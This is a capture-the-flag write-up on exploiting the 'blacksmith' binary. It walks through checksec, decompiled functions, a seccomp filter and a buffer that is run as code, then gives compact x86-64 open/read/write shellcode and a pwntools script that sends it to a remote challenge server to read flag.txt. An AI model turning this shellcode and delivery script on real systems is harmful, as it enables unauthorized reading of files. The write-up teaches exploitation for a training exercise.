You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".

In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing AMD64 (x86_64) assembly
  • Retrieving the flag

First looks

We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:

$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..
The program output

Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of blacksmith binary is:

$ checksec blacksmith
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
The checksec output

The fields in checksec mean the following:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
  • RELRO: Relocation Read-Only - secures the dynamic linking process
  • Stack Canaries: protects against stack buffer overflow attacks
  • NX: No eXecute - write-able memory cannot be executed
  • PIE: Position Independent Executable - address randomization
  • RWX: Read Write Execute - there's memory that's RWX

The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt (based on the challenge description).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:

  • an information leak primitive to leak an address
  • an arbitrary write primitive to control the execution flow

... which can work together by controlling the execution flow by writing a leaked address.

Main analysis

When I want to find vulnerability primitives, I open the binary in Ghidra, a reverse engineering tool developed by the NSA (yes, that NSA). I start off analyzing a binary at its main function. In this case, it looked like the following:

void main(void)
{
  size_t __n;
  long in_FS_OFFSET;
  int i_has_things;
  int i_option;
  char *local_20;
  char *local_18;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  setup();
  // ...
  __isoc99_scanf("%d",&i_has_things);
  if (i_has_things != 1) {
    puts("Farewell traveler! Come back when you have all the materials!");
    exit(34);
  }
  printf(s_What_do_you_want_me_to_craft?_1._001012e0);
  __isoc99_scanf("%d",&i_option);
  sec();
  if (i_option == 2) {
    shield();
  } else if (i_option == 3) {
    bow();
  } else if (i_option == 1) {
    sword();
  } else {
    write(STDOUT_FILENO,local_18,strlen(local_18));
    exit(261);
  }
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
Decompilation of the main function

So, the main function does the following:

  1. setup()
  2. sec()
  3. shield(), bow() or sword()

In addition to that, the main function uses a stack canary stored in the variable __can_token. As you can see, if __can_token is not equal to the original value, stack corruption has been detected and hence __stack_chk_fail is called, which exits the program.

The setup function disables buffering for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.

Sec function

void sec(void)

{
  void* ctx;
  long in_FS_OFFSET;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  // ...
                    // allow sys_read, sys_write, 
                    // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
The sec function

We can see that the sec function primarily creates an allow list using seccomp of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from executing our shell on the server since we would need to sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.

Shield analysis

Furthermore, we have the shield(), bow() or sword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which makes them irrelevant. So the vulnerability must be in shield().

void shield(void)

{
  size_t strlen;
  long in_FS_OFFSET;
  char buf[72];
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080);
  write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen);
  strlen = ::strlen("Do you like your new weapon?\n> ");
  write(1,"Do you like your new weapon?\n> ",strlen);
  read(0,buf,63);
  (*(code *)buf)();
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
                    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return;
}
The shield function

What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();. The code (*(code *)buf)(); is equivalent to the ASM below:

00100dd9 48 8d 55     LEA       RDX, [RBP - 0x50]   ; code* RDX = &buf
         b0
00100ddd b8 00 00     MOV       RAX, 0x0
         00 00
00100de2 ff d2        CALL      RDX                 ; RDX()
ASM version of (*(code *)buf)();

The  (*(code *)buf)(); function call executes the buf variable on the stack as if it was assembly. This means we can inject assembly into the program.
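To make the primitive concrete, here is a local Python illustration (a hypothetical demo using ctypes and mmap, not the challenge binary) of bytes in a buffer being called as code. The demo needs to create its own RWX mapping; in the challenge, checksec already told us the binary has RWX segments.

```python
import ctypes
import mmap

# Anonymous read/write/execute mapping to hold our "shellcode".
buf = mmap.mmap(-1, mmap.PAGESIZE,
                prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
buf.write(b"\xb8\x2a\x00\x00\x00\xc3")   # mov eax, 42 ; ret

# Treat the buffer's address as an `int f(void)` and call it,
# just like (*(code *)buf)(); does in shield().
addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
func = ctypes.CFUNCTYPE(ctypes.c_int)(addr)
result = func()
print(result)  # 42
```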

Developing AMD64 (x86_64) assembly

We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:

  • We have 63 bytes to work with:
  // shield() function
  read(STDIN_FILENO,buf,63);
  (*(code *)buf)();
Part of the shield() function
  • We can only use sys_read, sys_write, sys_open and sys_exit:
  // sec() function
  // allow sys_read, sys_write, 
  // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
Part of the sec() function
  • We do not have a stack address (ASLR)

However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.

To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) with the Linux kernel which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent way to learn more about the kernel (I've read it).

I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:

// sys_open(char* filename, int flags, int mode)
int fd = sys_open("flag.txt", 0, 0);  

// sys_read(int fd, char* buf, size_t count)
int written = sys_read(fd, buf, 0x9999);

// sys_write(int fd, char* buf, size_t count)
sys_write(1, buf, written);
C pseudocode of the ASM payload

I came up with the following ASM:

mov rax, 2
lea rdi, [rip+41]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall

mov rdx, rax
mov rax, 1
mov rdi, rax
syscall
Payload used to leak flag.txt

Since we have only 63 bytes to work with, I had to be creative. In assembly, most bytes are spent on immediate constants: an instruction like mov rax, 2 encodes the constant as a multi-byte immediate inside the instruction itself. That means we can save a lot of bytes by reusing register values.
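To see where the bytes go, compare the hand-assembled encodings (per the x86-64 ISA; hardcoded here so nothing needs an assembler) of a few ways to put a small constant in RAX:

```python
# mov rax, 2: REX.W prefix + opcode + ModRM + 4-byte immediate = 7 bytes
mov_rax_2 = bytes.fromhex("48c7c002000000")
# xor rax, rax: zeroing a register costs only 3 bytes
xor_zero  = bytes.fromhex("4831c0")
# push 2 ; pop rax: loading a small constant in 3 bytes total
push_pop  = bytes.fromhex("6a02" "58")
print(len(mov_rax_2), len(xor_zero), len(push_pop))  # 7 3 3
```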

I eventually refactored the payload into 46 bytes:

push r10
inc r10
mov rax, r10
lea rdi, [rip+31]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall
The final compressed ASM payload

Retrieving the flag

Now we have a steady payload, we need to send it to the application. I made the following script using pwntools:

#!/usr/bin/python3

from pwn import remote, gdb, ELF, asm, context
import time

e = ELF('blacksmith')

is_remote = True
if is_remote:
    p = remote("64.227.36.64", 32615)
else:
    p = e.process()

context.binary = e.path  # set the pwntools context for asm()

p.sendlineafter(b"all!\n> ", b'1')
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2')  # get to shield()

payload = asm(f'''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall''')

print(f"writing ASM with {len(payload)} bytes")

# payload = payload + filler + filename
payload += b"flag.txt"
print(f"writing ASM+filename with {len(payload)} bytes")

p.sendafter(b"weapon?\n> ", payload)
while True:
    print(p.recvline())
The final script used for sending the payload to the application
]]>